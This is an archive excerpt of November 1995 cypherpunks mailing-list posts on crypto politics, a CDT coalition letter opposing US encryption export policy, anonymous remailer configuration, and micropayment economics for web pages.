Date: Fri, 10 Nov 1995 08:03:09 +0800
Subject: Gingrich, "crypto coalition" & dysfunctional philosophy
In-Reply-To: <199511091637.RAA06491@utopia.hacktic.nl>
Message-ID: <199511092308.PAA18692@netcom14.netcom.com>



From: nobody at REPLAY.COM (Anonymous)
>The gov't may well lose this fight eventually, but a few heads are gonna
>get broken before either side wins. This fight is playing itself out on
>the level of policy now, but it's much bigger than a policy issue. And the
>"revolution" of Newt and his legions of weenies (I say nothing of Clinton
>and his legions of weenies) is bullshit: he's an empty opportunist who's
>riding a fractious coalition that'll make Clinton look like a libertarian
>if it ever gets control of the country. And right now he's cluing in to
>the fact that he can score some points on encryption issues: he's got his
>eye on the snowballing WiReD coalition, which *no one* knew existed until
>a few years ago.

a short comment on Gingrich: I think he is one of the few politicians with
balls enough to make tough choices such as budget cutting. of course people
detest someone like him. he has horrible approval ratings in the single
digits. people would rather have politicians lie to them that no tough 
choices are necessary in the future, or that if any are, all the 
grandmothers in the country will be conviently exempted. I don't see 
Gingrich at all as an opportunist in the sense of Clinton, i.e. someone 
who has no intrinsic moral compass
that governs his decisions and positions on issues. to the contrary Gingrich
has definite convictions on various issues. he is willing to compromise
on them frequently to get a consensus, however.

but my main point in writing was that I thought I would highlight this 
phrase given to us by A.Nonymous: the "crypto coalition".
or it might be called the "computer coalition". I think I see a few
faint glimmerings of a new political movement, potentially.
the recent Washington Times editorial on the Exon pornography law,
encryption, and the superiority of allowing people to develop tools
to screen what they don't want to so, could be considered a
portrayal of some of the key philosophies.

its very interesting to contemplate that the online crowd could become
a more well-organized political coalition that has influence in politics.
its clear to me this is happening weakly and informally at the moment.
(i.e. people on the internet having similar philosophies, hence voting
with the same aims, although not organizing to do so yet).
a key ingredient I see working against this:

the "coalition" has a lot of libertarian sentiments, and libertarians
tend to be anti-government and almost disdainful of even participating
in politics.

one might differentiate between cybernauts who are interested in reforming
our government and using the Net as a tool to do so, such as Jim Warren, and
people at the opposite end of the spectrum of "participation" such as
TCM, who seem to advocate that political battles be simply rejected
or ignored as irrelevant to the future of "cryptoanarchy". (although recent 
noises of his I quoted were distinctly uncharacteristic.)

if anyone is going to have influence in politics, it would be the former
type. but at least in the places in cyberspace where I hang out, I tend
to see more of the latter type: extremist libertarians who almost seem
to suggest that government is inherently unclean and dirty, no matter
what form it takes. I think these are the types that would hate a
government and advocate disenfranchisement with it no matter what 
direction it took, even if a libertarian was
elected to a powerful office. (its an interesting question to contemplate).

it seems to me to be largely a philosophy of alienation bordering
on nihilism.

now, I have been trashed in public for this position before, but the
philosophy of "us vs. them" applied to government in my opinion is the
wrong paradigm and only contributing to the problems, imho. an organized
"cyberspace coalition" could have tremendous political power to the point
that all the key annoying laws (such as the Itar etc.) actually become
election issues brought into mainstream consciousness. the editorials
I have seen about the Exon amendment etc. are steps in those directions.

I've seen TCM argue on this list against this, such that we should just
give up on telling congress what is important to us etc.  it was a position
that was not unanimous, and in fact quite controversial however, and 
remarkably PM once argued against it. (heh. love the fireworks on this list.
they are quite unpredictable at times).

I'm all for replacing a dysfunctional government. but people here seem
to advocate that this happens automatically when one has certain 
technology.

there is a whole other approach to "cryptoanarchy" that no one here
has ever suggested, but which could be tremendously effective: "infiltrate"
political positions with people sympathetic to that philosophy, and work
to change the entire structure toward it. "infiltrate" is a scary word,
but IMHO nothing any different than demopublicans appointing demopublicans
to office would be going on.

a very interesting, key quote by someone here went to the effect: "if
TCM is right, nothing the government does matters. if TCM is wrong, 
nothing we do matters". a fascinating psychological justification for
a sort of nihilism. but at the root of it is a kind of laziness and
hostility to organization or groups in any form, IMHO.

in fact the libertarian extremists here seem not only to hate government,
they seem to hate the whole idea of groups accomplishing things, about
the idea of groups coming to consensus. this is a quite remarkably
cynical ideology.

I'm going to make a prediction: I think the people who are interested
in organizing the "cyberspace coalition" are starting to come together
right now, and that over the long run, this entity will be far more
beneficial in advancing a better reality through cyberspatial technology
than all the people who advocate disillusion, antagonism, resentment, 
and nonparticipation in groups and government, to the point the latter 
approach will be generally discredited. in other words, we have a powerful 
system that can be changed from the inside instead of abandoning it. at the 
moment, I've not seen any proof that a dedicated group couldn't reform it from
the inside, only a lot of cynical conventional wisdom that such a thing
is inherently impossible and useless to try.

the comment I quoted displays the conventional wisdom on this list, 
that the encryption issue is "us vs. them", "people vs. the government",
etc.  what would A.Nonymous say if someone who was elected began to 
embrace the position that encryption is a right? I'm sure he would find
some new reason to be disillusioned with government. that's the position
of radical libertarians. no matter what form government takes, no matter
who is driving it, they hate it. 

the first lesson for radical libertarians bordering on anarchists 
that love this list is not that Oppressive Government is  the problem, but 
that Government Is Always Bogus. a rather infantile philosophy that reminds
me of the way children defy authority or structure merely because it
is an authority or a structure, not because of any particular disagreements
they have with the underlying philosophy it expresses. (or rather, they
manufacture the disagreement with the philosophy as required, such that
the reasoning is, if an authority stands for [x], then I am against [x], and
against that authority).

and this is precisely the dysfunctional
philosophy to life I am referring to that I think will be discredited in 
the long run as intellectually vacuous and actual counterproductive to
any kind of progress.

from what I have seen of Gingrich, he might be a potential leader of this
kind of "computer coalition". he is the congressman who has taken stands
on encryption issues and other key cyberspace issues that seem to suggest
an internal awareness of constitutional rights superseding momentarily-
politically-fashionable government legislative whims. of course I'm
putting on my flameproof longjohns as I say that. 







From bdolan at use.usit.net  Thu Nov  9 16:12:29 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Fri, 10 Nov 1995 08:12:29 +0800
Subject: Adm. William Studeman speaks about the CIA (fwd)
Message-ID: <Pine.SOL.3.91.951108193642.24896C-100000@use.usit.net>




---------- Forwarded message ----------
Date: Wed, 08 Nov 95 17:24:55 CST
Subject: Adm. William Studeman speaks about the CIA

 
 
SAN ANTONIO -- Admiral William Studeman, Deputy Director, CIA spoke
to the San Antonio World Affairs Council on Wednesday (8 Nov).  He
covered the organization of the Central Intelligence Agency;
foreign intelligence;  the future of intelligence;  and went on to
state:
 
     "While the press is reporting a reduced need for intel-
     ligence..  President Clinton has signed an Executive Order
     increasing the level of intelligence collection to a level
     4..   A level 4 for example are countries like Somalia,
     Haiti, and Yugoslavia..  so the collection needs are much
     greater than ever before."
 
     "This administration now also requires that intelligence be
     turned over to law enforcement agencies;  which was never
     done before."
 
     [...]






From ddt at lsd.com  Thu Nov  9 16:13:42 1995
From: ddt at lsd.com (Dave Del Torto)
Date: Fri, 10 Nov 1995 08:13:42 +0800
Subject: European Online Development list
Message-ID: <v03003b01acc6f3c3d676@[129.46.82.88]>


[In case this interests any of you. -dave]

................................. cut here .................................

>Date: Wed, 8 Nov 1995 19:28:25 +0100
>From: steve at isys.hu (Steven Carlson)
>Subject: invitation to join the European Online Development list
>
>Greetings -
>
>I'm writing to invite you to join the European Online Development list
><online-europe>. If you're active or interested in Internet in Europe or
>the CIS, this list may be for you.
>
>I'm inviting you because you're one of my circle of contacts, and work
>either in journalism or in an Internet-related field. I'm sending a
>similar letter out to several hundred people who attended Esther Dyson's
>East-West High-Tech Forum, held recently in Bled, Slovenia.
>
>A day before this year's conference opened, Esther held a special meeting
>of Internet providers and related companies from around Europe and the
>CIS. We all agreed it was a very useful meeting, that we should meet again
>soon, and that we should all try to keep in contact over the net.
>Therefore this list.
>
>As commercial Internet pioneers in Europe, we find ourselves in surprising
>agreement on a number of topics. Though many of us now earn our daily
>bread from providing Internet connectivity, many of us suspect the real
>future may be in content. Yet what form this new medium will take - or who
>will pay how much for what - still remains a mystery.
>
>We share concerns about privacy, copyright, encryption, censorship and
>libel. In each of our countries, these and other issues will eventually
>need to be addressed by new laws, laws that will be written by people who
>- we suspect - know very little about online realities.
>
>In each of our countries, the local PTT is waking up to the smell of
>profits in the IP market. These telecoms much prefer a comfortable
>monopoly to the vagaries of competition. The PTTs have considerable
>financial resources and political connections. How can smaller Internet
>providers compete with these giants on even terms? Who will guarantee a
>level playing field?
>
>I think you'll agree there's plenty to talk about. And at this early stage
>in the development of Internet that's exactly what we need to do.
>
>I hope this list becomes a useful resource: a place to learn what others
>are doing in Europe and the CIS; a place to identify potential partners; a
>place to watch and learn.
>
>To subscribe, send a message with no subject line, and the text: subscribe
>online-europe, to <majordomo at isys.hu>. Contact me if you need help
><steve at isys.hu>.
>
>Once you subscribe, you might want to a send a message to the list
>introducing yourself and your company. Give us some idea of what problems
>you're working with in the field of Internet media or connectivity. Or, if
>you like, share with us your success stories.
>
>Send your posts to <online-europe at isys.hu>
>
>A full WWW archive of online-europe is available at
><http://www.isys.hu/online-europe>. Don't get too excited yet. At present
>all you'll find there are some test messages.
>
>Thanks for your attention, look forward to seeing you on the list.
>
>=steve=
>
>---
>Steven Carlson
>iSYS Hungary info at isys.hu
>steve at isys.hu http://www.isys.hu







From ghio at utopia.hacktic.nl  Thu Nov  9 16:30:15 1995
From: ghio at utopia.hacktic.nl (Matthew Ghio)
Date: Fri, 10 Nov 1995 08:30:15 +0800
Subject: encrypt-key remailers
In-Reply-To: <Pine.SOL.3.91.951107143109.23860A-100000@gorf.rs.itd.umich.edu>
Message-ID: <199511080318.EAA29662@utopia.hacktic.nl>


Jennifer Mansfield-Jones (cardtris at umich.edu) wrote:

>  ::
>  Encrypt-Key: apasswd
>  Request-Remailing-To: cardtris at umich.edu
>  Subject: reply-block-test
>  
>  **
...

>  
> Trying the above, I find that it does *sort of* work as a reply
> block.  If I append sample text and send everything to
> remailer at flame.alias.net, I get a reply back that looks like, for
> instance: 
>
> Date: Mon, 6 Nov 1995 19:22:13 +0100
> From: Anonymous <nobody at flame.alias.net>
> To: cardtris at umich.edu
> Subject: reply-block-test
>
> **
>
>
> The appended text, which I expected to come back conventionally
> encrypted with 'apasswd', has just vanished into the void.  
> Obviously I'm missing something... probably something that seemed 
> painfully obvious to the writer of the remailer help file.  If I 
> omit the encryption key and '**', I can get reply blocks to work fine,
> even chained through multiple remailers.  Suggestions?

This is a configuration problem at the remailer, most likely a missing 
randseed.bin file.






From vznuri at netcom.com  Thu Nov  9 16:33:41 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Fri, 10 Nov 1995 08:33:41 +0800
Subject: the revolution of microcurrency
Message-ID: <199511092347.PAA22507@netcom14.netcom.com>



the topic of "microcurrency" has come up on this list before and
is reappearing with considerations being given to small charges
for Web pages. I've been thinking about this a bit and thought I'd
share some interesting ideas. (YMMV!!)

1st, there was a really excellent article on microcurrency in the
Economist I believe that was really touting it as a revolutionary
change in the economy. I agree with this wholeheartedly. the possibility
that people can

- exchange extremely small amounts of cash without the cost of overhead 
- and virtually instaneously, 
- over large geographical distances, 
- potentially even seamlessly with regard to different currency exchanges, 
- and a large infrastructure exists to distribute intellectual property for 
  free,
- (possibly invisibly to governments)

will all contribute to a REVOLUTIONARY effect on culture.

my key idea on all of this is that the whole idea of copyright
is going to melt when you introduce cash, not be strengthened. there
are a lot of people out there who think that one has to try to put
a lock and chain on web pages or whatever that one is "selling", 
and the horrible problem of the net is that anything can be copied.
and these people are feverishly working on specious "solutions" to this 
"problem" right now.

WRONG!!

this is precisely the view from the old ideology that says, "you
have to protect what you are selling from other people or you 
won't make any money". this theme will increasingly be discredited in 
the cyberspace world, which works inherently differently in a 
remarkable manner.

I submit that things like the release of public domain standards
and products like Java and Netscape for free are not merely blips at this 
moment but increasingly are going to be the marketing plan of the future. the
idea is that you give away your product for FREE, and then people
pay you if they like it. this new ideology will be relevant to 
products that are not "things" but in fact are more in the realm of
intellectual property, i.e. writing, software, cyberspace web pages, etc.

the beauty of this system is that NO LONGER is "unauthorized" 
distribution" the "enemy". it is your FRIEND, a key aspect of profit!!
the company that doesn't think in terms of this new ideology will 
try to control the distribution of their product. they will set up
draconian systems that try to restrict the flow of the product
to "authorized users". (i.e. those who pay in advance). our entire
society thinks within this paradigm, including the government, which
is makes noises about ways to restrict copying on the internet by 
introduction of actual physical safeguards. NOPE!!

a rather extraordinary new economy can replace this, that of voluntary
payment. widespread distribution becomes your FRIEND. you DISDAIN
things like copyright, because they prevent your "product" from reaching
the eyes of potential customers. your goal is actually to distribute
the product as far as possible, in a sort of pyramid-like scheme.
you want your "customers" to distribute your product to their friends,
so that those "friends" potentially become customers in an endless
cycle.

this approach works amazingly with writing. imagine that if John Markoff
suddenly QUIT the NYT and just wrote articles on his own. and imagine
that at the bottom, you see a message, "for more of the same, send
.5c or more to markoff at liberated.com". I submit that in the future, 
Markoff will probably be able to make more money than he does at NYT,
because he is eliminating the middleman. the newspaper company is 
primarily built as a *distribution* channel. suddenly he doesn't have
to pay anything out of his own salary, so to speak, for distribution.
distribution is *free*. he doesn't require anyone else to do it for him.
he puts his article in an apropriate place on the net and it circulates
like a VIRUS if it is well received. the more people that see the article,
the more people that pay him money.

in an information system, individual objects have no value. what has value
is the FLOW of quality information. if Markoff continues to flow with that
good information, people will continue to pay for it. they will perceive
that "by paying him, the quality information flow from him to me continues
or increases".

this same idea works with software. you don't see software as an end
product. you see it as something that is evolving over time. and whenever
you send money to a company for software, in this new system the idea
is that "I like this software, and I want to see it grow. here is my
contribution to that".

another interesting area is that of patents, and I see this dissolving
in the same way. a patent is like trying to put a lock on an idea. but
gradually people will realize, only ideas that are implemented have
any value. you can't profit and lock an idea at the same time. 
*dissemination* of ideas is what leads to profit, not locking them up.

hence there will be an economic incentive to an inventor to give away
his ideas for free, at first. in the old system, where one thinks of an idea 
as a "thing", this sounds preposterous. but in a new culture where ideas
are seen as things that need to be cultivated and grown to work, it will
seem eminently sensible. the inventor is releasing his idea to the world,
saying "I can expand on this idea, even turn it into a reality, if
you send me money". other people can of course steal the idea, but there
is no value in the idea itself: the value is in the development of it
into evolved new states, or the intellectual expertise of the inventor.

in short, microcurrency could have quite a liberating and revolutionary
effect on economics as we know it. in the current system, people are not
paid for tiny contributions to the whole. the contributions have to be
"packaged up" into something like a magazine before individuals can get
any profit. a new system may allow people to be compensated directly
for things that are hard to quantify.

 how much was Markoff's last article
worth in the NYT? that's impossible to figure out. but if you had a 
microcurrency, you can calculate exactly how much money people sent to 
Markoff for his last article. say, across the world, it totalled $843.16.
such a sum is not inconceivable. and over time it would be enough for
him to make a salary over the whole year on, perhaps!! I'm arguing that
this is increasingly going to become VIABLE over the next few years
with cyberspace and microcurrency.

the beauty of this system is that this increased granularity filters
down to individual pieces such as a single piece of writing, a single
software program, single contributions by individual people that can
be rewarded tangibly. that's all that currency is, in its most basic
form: a system whereby members of a society say to each other, 
"please continue to do that for me, do more of it, and do it even better--
because I value it *this* much!!"

there is a lot of ink in the press lately about the Netscape/Java
assault on the Microsoft bastion. I think there is something more
important conceptually going on at a lower level. Microsoft has never
released a product for free to the world. they are still in the old
paradigm, "you have to control something to prosper". they are at
this minute coming out with a PROPRIETARY (read: "you have to lock something
to profit from it") alternative to Java. Netscape understands the contrary
philosophy BEAUTIFULLY. you write the software, and DISTRIBUTE IT FOR FREE.
same with Java: you create OPEN STANDARDS. these companies don't fully
understand what direction they are going in (notice how they are only
committing to the idea of free software or standards "from the start", but
not afterwards), but I think they are the precursors to a radically 
transformed economic system based on cyberspace microcurrency. 

the microcurrency situation can even be set up in a company. "whoever
codes this computer problem will receive [x] dollars from the company".
the whole economic system becomes a fluid, pulsing entity that filters
down to the tiniest fraction of value and gives each individual a 
quantitative value on his contribution. companies talk about "incentive
systems" today, but perhaps the entire economy will become an enormous
incentive system in this way in the future!!

in this system, ultimately, I think the whole concept that someone "buys a 
product" will dissolve into the idea that "one rewards intellectual
productivity to bring more of the same". it's as fundamental and 
intuitive as the difference between atoms and bits.








From editor at cdt.org  Thu Nov  9 16:48:18 1995
From: editor at cdt.org (editor at cdt.org)
Date: Fri, 10 Nov 1995 08:48:18 +0800
Subject: CDT Policy Post No. 29 - Coalition Says New Crypto Policy Flawed
Message-ID: <v02130505acc847b81d63@[204.157.127.4]>


Pardon the massive mailing (I have never posted a full Policy Post to this
list before), but I thought a majority of you would find this interesting
and relevant.

Jonah
(editor at cdt.org)

------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************
  **         **      **       ***               POLICY POST
  **         **      **       ***
  **         **      **       ***               November 9, 1995
  **         **      **       ***               Number 29
  ********   *********        ***
   ******    ********         ***

  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST Number 29                      November 9, 1995

CONTENTS: (1) Public Interest/Industry Coalition Says Administration Crypto
              Policy Flawed -- Pledges to Develop Alternative
          (2) Text of CDT-led coalition letter to Vice President Gore
          (3) How To Subscribe To The CDT Policy Post Distribution List
          (4) About CDT, Contacting Us

This document may be re-distributed freely provided it remains in its
entirety. Excerpts may be re-posted by permission (editor at cdt.org)
-------------------------------------------------------------------------

(1) Public Interest/Industry Coalition Says Administration Crypto Policy
    Flawed -- Pledges to Develop Alternative

A broad coalition of nearly forty public-interest organizations, trade
associations, and representatives from the telecommunications and computer
hardware and software industries sent the attached letter to Vice President
Albert Gore on Wednesday, objecting to the Administration's recently
announced cryptography policy.

While the letter praised the administration for its efforts to develop a
national cryptography policy, the signatories, which include groups such as
EFF and companies such as America Online, Apple, AT&T, MCI, Lotus,
Microsoft, and Tandem Computer (organized by CDT), expressed concern that
the Administration's proposal is weighed heavily in favor of law
enforcement and national security while neglecting the privacy and security
needs of individuals and the marketplace.

The letter states:

 "A secure, private, and trusted Global Information Infrastructure
  (GII) is essential to promote economic growth and meet the needs of
  the Information Age society.  Competitive businesses need cryptography
  to protect proprietary information as it flows across increasingly
  vulnerable global networks. Individuals require privacy protection in
  order to build the confidence necessary to use the GII for personal and
  financial transactions... The undersigned groups recognize that
  the Administration's recently articulated cryptography initiative was a
  serious attempt to meet some of these challenges, but the proposed
  initiative is no substitute for a comprehensive national cryptography
  policy.  To the extent that the current policy becomes a substitute for
  a more comprehensive policy, the initiative actually risks hindering
  the development of a secure and trusted GII."

The coalition pledged to work together to formulate recommendations for an
alternative cryptography policy based on the following principals:

* ROBUST SECURITY:  access to levels of encryption sufficient to address
  domestic and international security threats, especially as advances in
  computing power make currently deployed cryptography systems less
  secure.

* INTERNATIONAL INTEROPERABILITY:  the ability to securely interact
  worldwide.

* VOLUNTARY USE: freedom for users to choose encryption solutions,
  developed in the marketplace, that meet their particular needs.

* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to
  meet the expressed needs of cryptography users.

* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth
  Amendment privacy protection and regulation of searches, seizures, and
  interceptions.

* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national
  security, while recognizing the reality that determined criminals will
  have access to virtually unbreakable encryption.

A second group, composed of conservative/libertarian organizations
including Americans for Tax Reform and Citizens for A Sound Economy, issued
a similar letter on Wednesday to House Speaker Newt Gingrich. The text of
that letter, as well as additional information on the cryptography policy
debate, can be found on CDT's Cryptography Issues Page:

        URL:http://www.cdt.org/crypto.html

The letters come as the National Institute of Standards & Technology (NIST)
this week announced revisions to the Administration's proposed export
criteria announced last September (See CDT Policy Post No. 24). The revised
proposal is substantively similar to the previous version, and maintains
controversial provisions including:

* LIMITS ON KEY LENGTH: The revised proposal would continue to only
  allow the export of cryptography systems with 64 bit key lengths, but
  only if the keys are escrowed by an agent approved by the U.S.
  Government and if the systems meet the other export criteria.

* RESTRICTED INTEROPERABILITY: While the revised proposal does clarify
  the interoperability provision,  it would continue to prohibit
  exportable products from operating with any other cryptographic
  products that do not meet the NIST criteria.

* NO PRIVACY SAFEGUARDS: The proposal contains no mention of the
  procedures for law enforcement access to escrowed keys, the standards
  for certifying escrow agents, or the obligations on escrow agents to
  protect privacy.

CDT believes that the NIST proposals fall far short of the promise for a
more sensible and comprehensive cryptography policy outlined last July in
Vice President Gore's letter to Rep. Maria Cantwell.  The current proposal
fails to provide adequate security, protect the privacy of individuals, and
meet the needs of the global marketplace. CDT believes that a more
comprehensive approach to cryptography policy is necessary to address both
the immediate need for strong cryptographic applications and the long-term
development of a secure and trusted Global Information Infrastructure. CDT
will work with the signatories of the letter to over the next six months to
develop an alternative to the Administration's proposal.

-----------------------------------------------------------------------

(2) Text of CDT-led Coalition Letter to Vice President Gore


November 8, 1995

The Honorable Albert Gore, Jr.
Office of the Vice President
Old Executive Office Building, Room 276
Washington, D.C. 20501

Dear Mr. Vice President:

A secure, private, and trusted Global Information Infrastructure (GII) is
essential to promote economic growth and meet the needs of the Information
Age society.  Competitive businesses need cryptography to protect
proprietary information as it flows across increasingly vulnerable global
networks. Individuals require privacy protection in order to build the
confidence necessary to use the GII for personal and financial
transactions.  Promoting the development of the GII and meeting the needs
of the Information Age will require strong, flexible, widely-available
cryptography.  The undersigned groups recognize that the Administration's
recently articulated cryptography initiative was a serious attempt to meet
some of these challenges, but the proposed initiative is no substitute for
a comprehensive national cryptography policy.  To the extent that the
current policy becomes a substitute for a more comprehensive policy, the
initiative actually risks hindering the development of a secure and trusted
GII.

A number of the undersigned organizations have already written to express
concern about the latest Administration cryptography initiative. As some of
us have noted, the Administration's proposed export criteria will not allow
users to choose the encryption systems that best suit their security
requirements.  Government ceilings on key lengths will not provide an
adequate level of security for many applications, particularly as advances
in computing render current cryptography systems less secure.   Competitive
international users are steadily adopting stronger foreign encryption in
their products and will be unlikely to embrace U.S. restrictions.  As they
stand, current export restrictions place U.S. hardware manufacturers,
software developers, and computer users at a competitive disadvantage,
seriously hinder international interoperability, and threaten the
strategically important U.S. communications and computer hardware and
software industries. Moreover, the Administration policy does not spell out
any of the privacy safeguards essential to protect individual liberties and
to build the necessary public trust in the GII.

The current policy directive also does not address the need for immediate
liberalization of current export restrictions. Such liberalization is vital
to enable U.S. companies to export state-of-the-art software products
during the potentially lengthy process of developing and adopting a
comprehensive national cryptography policy. Without relief, industry and
individuals alike are faced with an unworkable limit on the level of
security available and remain hamstrung by restrictions that will not be
viable in the domestic and international marketplace.

Many members of the undersigned groups have been working actively with the
Administration on a variety of particular applications, products, and
programs promoting information security.  All of us are united, however, by
the concern that the current network and information services environment
is not as secure as it should be, and that the current policy direction
will delay the secure, private, and trusted environment that is sought.

Despite the difficulties of balancing the competing interests involved, the
undersigned companies, trade associations, and privacy organizations are
commencing a process of collective fact-finding and policy deliberation,
aimed at building consensus around a more comprehensive cryptography policy
framework that meets the following criteria:

* ROBUST SECURITY:  access to levels of encryption sufficient to address
  domestic and international security threats, especially as advances in
  computing power make currently deployed cryptography systems less
  secure.

* INTERNATIONAL INTEROPERABILITY:  the ability to securely interact
  worldwide.

* VOLUNTARY USE: freedom for users to choose encryption solutions,
  developed in the marketplace, that meet their particular needs.

* ACCEPTANCE BY THE MARKETPLACE: commercial viability and ability to
  meet the expressed needs of cryptography users.

* CONSTITUTIONAL PRIVACY PROTECTIONS: safeguards to ensure basic Fourth
  Amendment privacy protection and regulation of searches, seizures, and
  interceptions.

* RESPECT FOR THE LEGITIMATE NEEDS OF LAW ENFORCEMENT and national
  security, while recognizing the reality that determined criminals will
  have access to virtually unbreakable encryption.

In six months, we plan to present our initial report to the Administration,
the Congress, and the public in the hopes that it will form the basis for a
more comprehensive, long-term approach to cryptography on the GII. We look
forward to working with the Administration on this matter.

Sincerely,

American Electronics Association
America Online, Inc.
Apple Computer, Inc.
AT&T
Business Software Alliance
Center for Democracy & Technology
Center for National Security Studies
Commercial Internet eXchange Association
CompuServe, Inc.
Computer & Communications Industry Association
Computing Technology Industry Association
Crest Industries, Inc.
Dun & Bradstreet
Eastman Kodak Company
Electronic Frontier Foundation
Electronic Messaging Association
EliaShim Microcomputers, Inc.
Formation, Inc.
Institute for Electrical and Electronic Engineers - United States Activities
Information Industry Association
Information Technology Industry Council
Information Technology Association of America
Lotus Development Corporation
MCI
Microsoft Corporation
Novell, Inc.
OKIDATA Corporation
Oracle Corporation
Securities Industry Association
Software Industry Council
Software Publishers Association
Software Security, Inc.
Summa Four, Inc.
Sybase, Inc.
Tandem Computers, Inc.
Telecommunications Industry Association
ViON Corporation

---------------------------------------------------------------------------

(3) HOW TO SUBSCRIBE TO THE CDT POLICY POST LIST

CDT Policy Posts, which is what you have just finished reading, are the
regular news publication of the Center For Democracy and Technology. CDT
Policy Posts are designed to keep you informed on developments in public
policy issues affecting civil liberties online.

SUBSCRIPTION INFORMAITON

1. SUBSCRIBING TO THE LIST

To subscibe to the policy post distribution list, send mail to
"Majordomo at cdt.org" with:

    subscribe policy-posts

in the body of the message (leave the subject line blank)


2. UNSUBSCRIBING FROM THE LIST

If you ever want to remove yourself from this mailing list,
you can send mail to "Majordomo at cdt.org" with the following command
in the body of your email message:

    unsubscribe policy-posts youremail at local.host (your name)

(leave the subject line blank)

You can also visit our subscription web page URL:http://www.cdt.org/join.html

-----------------------------------------------------------------------
(4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance constitutional civil liberties
and democratic values in new computer and communications technologies.

Contacting us:

General information:  info at cdt.org
World Wide Web:       URL:http://www.cdt.org
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1001 G Street NW * Suite 500 East * Washington, DC 20001
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post No. 29                                        11/9/95
-----------------------------------------------------------------------







From mark at lochard.com.au  Thu Nov  9 17:31:53 1995
From: mark at lochard.com.au (Mark)
Date: Fri, 10 Nov 1995 09:31:53 +0800
Subject: Market Value of Web Pages
In-Reply-To: <acc79e46010210045c32@[205.199.118.202]>
Message-ID: <199511100143.AA22994@junkers.lochard.com.au>


>>BTW - I don't think we should be talking about a penny/page cost because it
>>is way too high for the current market.  For example, my copy of Applied
>>Cryptography V2 cost about $.067/page AND came with the media to keep it
>>"forever".  My (used) copy of Snow Crash cost closer to a penny/page and
>>also came with the media.  I would think that somewhere between 1/100 to
>>1/10 of a penny/page is closer to the current market value of the page
>>content.

>I expect this to someday change, and to pay for some things at a fraction
>of a cent per hit, some other things for a few cents a hit, and maybe even
>some things at dollars per hit.

The maths of ecash and web pages gets very interesting very quickly. If you
charge per page of a web server, $0.01 a page and you happen to be doing this
on a million-hits-a-day web server then you machine is earning you $10,000 
ecash bucks a day. How much is it to buy hardware and a link and set up
a nice web site everyone wants to visit? If it was left running you'd collect
$3,650,000 ecash bucks anually. That is just for browsing. Sales on top of that
via ecash (very low overheads relative to physical means) would mean very
high profits. 1% of browsers spending US$50 is US$500,000 a day, or per year
it is US$182,500,000. Not bad for an outlay of a couple of fast SPARCs and
a quick net link and some staff to maintain it.

If you toss arguements like this at some of the sites that would be viable for
the hit numbers and then explain the only way that will occur is if the crypto
laws are repealed, you will create a lot more lobbiers annoying their reps
for the cause. ecash without good crypto is like the Federal Reserve
deliverying cash with open pickup trucks. Or doing credit card purchases on
postcards.

Cheers,
Mark
mark at lochard.com.au





From hfinney at shell.portal.com  Thu Nov  9 18:17:22 1995
From: hfinney at shell.portal.com (Hal)
Date: Fri, 10 Nov 1995 10:17:22 +0800
Subject: ecash speed
In-Reply-To: <199511090130.UAA13562@jekyll.piermont.com>
Message-ID: <199511090508.VAA05884@jobe.shell.portal.com>


"Perry E. Metzger" <perry at piermont.com> writes:

>Hal writes:
>> The point is that if the anonymity afforded by ecash is too costly in
>> terms of time, then we may end up stuck with a non-anonymous system
>> simply because that is the only one efficient enough to work.  It would
>> be good to find out if that is a serious problem.

>I suspect that as CPU speed exponentiates this will become less and
>less of a problem. It doesn't especially worry me.

Consider, though, what happens in the current ecash system if it were
used to charge a penny per page.  You would click on a link in your web
browser to go to the new page.  It would set the GET request to the
remote server as usual.

The server would fire up a CGI script which will run the shop software.
That software will make a TCP stream connection back to your ecash wallet
software which is running on the system where your client is.  It sends a
request to get payed $.01.  Assuming the wallet is configured to
automatically approve such a payment, it will send a one penny coin to
the shop software along the opened link.  (This may also involve doing a
PK encryption on the coin as an anti-theft measure; this aspect of the
current ecash system is not documented AFAIK.)

The shop software then opens a TCP stream connection to the bank, and
forwards the coin there.  The bank receives it, and checks the public
key signature in the coin.  It then compares the coin against every other
coin which has ever been spent (within the validity period of the coin)
to make sure it is not being doubly spent.  If this all checks out it
sends back some authentication message to the original server.  The shop
software then delivers the new page to the client browser.

This all has to happen whenever you click on a link in your browser.
Even with fast CPU's I think the extra step of connecting to the bank,
having it check against all coins, and getting approval will be
considerable for each link traversal.

Hal





From frantz at netcom.com  Thu Nov  9 18:25:29 1995
From: frantz at netcom.com (Bill Frantz)
Date: Fri, 10 Nov 1995 10:25:29 +0800
Subject: Market Value of Web Pages
Message-ID: <199511100140.RAA09572@netcom11.netcom.com>


At 13:28 11/9/95 -0800, Timothy C. May wrote:
>With all due respect to Bill--his mention of agorics tells me he knows
>something about computational ecologies and markets--, there is no
>reasonable way to say what price is "closer to the current market value of
>the page content," except by what the market will bear!

Tim is absolutely correct that the market determines the current market
value.  I mentioned some low value items in the current market and he
mentioned some high value ones.

However, there is not really a problem in paying for high valued web pages
(like the $400/photo consultant report he mentions).  The various network
payment schemes that have been proposed and implemented will handle these
quite adaquatly.

What concerns me is building systems that can support low-cost high-volume
markets.  If I have to pay a penny/page, I am going to ask whether Netscape
can use a whole gigabyte disk for its cache and have basically a pay/copy
system.  If the cost is low enough, I will pay/view and avoid stale data in
the cache problems.  However, there are very few systems where the
transaction costs are low enough to support low-cost high-volume markets.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From karn at qualcomm.com  Thu Nov  9 18:36:08 1995
From: karn at qualcomm.com (Phil Karn)
Date: Fri, 10 Nov 1995 10:36:08 +0800
Subject: Photuris Primality verification needed
